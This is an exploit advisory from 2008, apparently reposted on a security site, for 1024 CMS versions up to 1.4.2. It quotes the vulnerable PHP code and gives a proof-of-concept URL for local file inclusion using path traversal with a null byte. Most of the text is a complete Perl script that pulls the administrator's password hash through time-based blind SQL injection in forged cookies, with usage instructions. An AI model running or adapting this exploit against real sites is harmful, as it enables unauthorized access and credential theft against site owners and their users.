1024 CMS <= 1.4.2 Local File Inclusion / Blind SQL Injection Exploit
来源:girex.altervista.org 作者:GiReX 发布时间:2008-04-14
# Author: __GiReX__ # mySite: girex.altervista.org # Date: 13/04/2008
# CMS: 1024 CMS <= 1.4.1 and 1.4.2 (beta) # Site: 1024cms.com
# Bug1: Local File Inclusion # Need: magic_quotes_gpc = Off / register_globals = On
# Bug2: Cookie Blind SQL Injection # Exploit: Admin Hash Retrieve Exploit # Need: magic_quotes_gpc = Off
# Bug1: Vuln Code: pages/print/default/ops/news.php <?php if(!isset($_GET['id']) || !is_numeric($_GET['id'])) die("ID Not Set"); include("./lang/".$lang."/news/default.php");
# $lang is unset so we can exploit through local file inclusion
# Include a local file in CMS directory # PoC: [host]/[path]/pages/print/default/ops/news.php?id=1&lang=../../../../../[local file]%00
# Bug2: Vuln Code: /includes/system.php: Lines 66-71
if(!isset($_SESSION['logged']) && (isset($_COOKIE['cookuid']) && isset($_COOKIE['cookpass']) && isset($_COOKIE['cooktype']) && isset($_COOKIE['cooklogged']))){ $_SESSION['logged'] = $_COOKIE['cooklogged']; $_SESSION['user'] = $_COOKIE['cookuid']; $_SESSION['type'] = $_COOKIE['cooktype'];
$chk_comb = mysql_query("SELECT id, type, warning, banned FROM ".$prefix."users WHERE username='".$_SESSION['logged']."' AND password='".$_COOKIE['cookpass']."'") or die("Cannot check combination: ".mysql_error());
# We can exploit this vulnerable query editing our cookies and making a blind sql injection
### Start Exploit ###
#!/usr/bin/perl -w # 1024 CMS <= 1.4.2 (beta) Remote Blind SQL Injection # Admin Hash Retrieve Exploit
use LWP::UserAgent; use HTTP::Request;
if(not defined $ARGV[0]) { print "usage: perl $0 [host] [path]\n"; print "example: perl $0 localhost /1024/\n"; exit; }
my $client = new LWP::UserAgent; my @cset = (48..57, 97..102); my $hash = undef; my $host = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0]: 'http://' . $ARGV[0]; $host .= $ARGV[1] unless not defined $ARGV[1];
banner(); check_vuln($host) or die "[-] Site not vulnerable: maybe magic_quotes_gpc = On\n\n"; syswrite(STDOUT, "[+] Admin Hash: ");
for($j = 1; $j <= 32; $j++) { for($i = 0; $i <= $#cset; $i++) { $pre_time = time(); $rv = check_char($cset[$i], $j); $post_time = time(); if($post_time - $pre_time > 3 and $rv) { $hash .= chr($cset[$i]); syswrite(STDOUT, chr($cset[$i]), 1); last; } } }
if(not defined $hash or length($hash) != 32) { print STDOUT "\n[-] Exploit mistake: please check the benchmark and the sql query\n\n"; } else { print STDOUT "\n[+] Exploit terminated\n\n"; }
sub banner { print "\n"; print "[+] 1024 CMS <= 1.4.2 (beta) Remote Blind SQL Injection\n"; print "[+] Admin Hash Retrieve Exploit\n"; print "[+] Coded by __GiReX__\n"; print "\n"; }
sub check_vuln { my $target = shift;
$get = new HTTP::Request(GET, $target); $get->header(Cookie => "cookpass=-1'; cookuid=0; cooktype=0; cooklogged=0; cookuser=0");
$res = $client->request($get); if($res->is_success) { return 1 if $res->as_string =~ /Cannot check combination/; } else { die "[-] Invalid target : ${target}\n\n"; }
return 0; }
sub check_char { my ($char, $n) = @_; $get->header(Cookie => 'cookpass=-1\'+AND+'. 'CASE+WHEN(SELECT ASCII(SUBSTRING(password,'.$n.',1))+'. 'FROM+otatf_users+WHERE+id=1)='.$char.'+'. 'THEN+BENCHMARK(90000000,CHAR(0))+END#; '. 'cookuid=1; cooktype=1; cooklogged=1; cookuser=1');
$res = $client->request($get);
return $res->is_success; }
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